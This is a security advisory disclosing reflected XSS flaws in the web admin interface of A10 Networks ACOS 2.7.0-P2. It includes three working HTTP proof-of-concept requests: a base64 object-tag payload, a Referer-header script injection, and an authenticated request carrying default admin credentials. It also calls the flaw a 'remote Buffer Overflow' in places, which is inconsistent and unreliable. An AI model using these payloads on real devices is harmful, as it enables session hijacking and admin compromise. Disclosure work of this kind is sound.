Article

A10 Networks Reflected XSS vulnerability

20-06-2014

Quantum Leap Advisory: A10 Networks remote Buffer Overflow in ACOS[1] 2.7.0-P2 – Adivsory #QLA140505
Affected Product: ACOS 2.7.0-P2(build: 53)  (older versions may be affected too) (Tested on SoftAX[2])
Credits: Vulnerability discovered by Francesco Perna of Quantum Leap s.r.l

Executive Summary

Using a specially crafted HTTP request, it is possible to exploit a lack in the neutralization[3] of the pages output wich includes the user submitted content. Successful exploitation of the vulnerabilities, results in the execution of arbitrary HTML and script code in user’s browser in context of the vulnerable web application trough a “Reflected XSS”.

Proof of Concept

The following paragraphs shows the two kind of XSS we found on the web administrative interface.

404 error page lead to XSS

Submitting arbitrary input in the HTTP request to a non existant resource, imply for the server to generate a 404 Error page. The generated error page includes the user input without it being neutralized. This behaviour leads to reflected XSS.  Since neither the “<script>” tag nor white spaces are allowed, to exploit the vulnerability could be used the “<object>” tag with the sample payload “<script>alert(1)</script>” encoded using base64.

GET ///<object/**/data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></object> HTTP/1.1
Host: 192.168.1.210
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive

Figure 1 shows the arbitrary code executed in the user browser context.

Figure 1 – A10 Networks Reflected XSS vulnerability – Object via GET

Another entry point is represented by the Referer header. In this case the  <script> TAG is allowed and the PoC is pretty straightforward.

GET /fake HTTP/1.1
Host: 192.168.1.210
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Referer: “/><script>alert(2)</script><Fake”
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive

Figure 2 shows the arbitrary code executed in the user browser context.

Figure 2 – A10 Networks Reflected XSS vulnerability – Script via Referer

Custom error page lead to XSS

Submitting arbitrary input, after being authenticated,  in the HTTP request, imply for the application to generate a custom error page. The generated error page includes the user input without it being neutralized. This behaviour leads to  reflected XSS.

GET /US/08a53c111eb0df06a6b3661db44937/sys_start.frm?=””<object/**/data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”>=1 HTTP/1.1
Host: 192.168.1.210
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Authorization: Basic YWRtaW46YTEw

Figure 3 shows the arbitrary code executed in the user browser context.

Figure 3 – A10 Networks Reflected XSS vulnerability – Object via GET

Solution

To fix the A10 Networks remote Buffer Overflow you have to upgrade at least to version  2.7.0-p3

Disclosure Timeline

2013-05-11 – A10 Networks Reflected XSS vulnerability discovered
2013-05-28 – Initial vendor notification
2013-05-30 – The vendor acknowledge the vulnerability (bug 128069 )
2013-05-30 – First Attempt to coordinate the vulnerability disclosure, no response
2013-06-19 – The vendor fixed the vulnerability
2013-07-10 – Second Attempt to coordinate the vulnerability disclosure, no response
2014-03-30 – Last vendor notification
2014-04-02 – The vendor did not respond
2014-04-02 – Public advisory

References

[1] http://www.a10networks.com/about/technology_platform_acos.php
[2] http://www.a10networks.com/glossary/SoftAX.php
[3] https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

L'hai trovato interessante?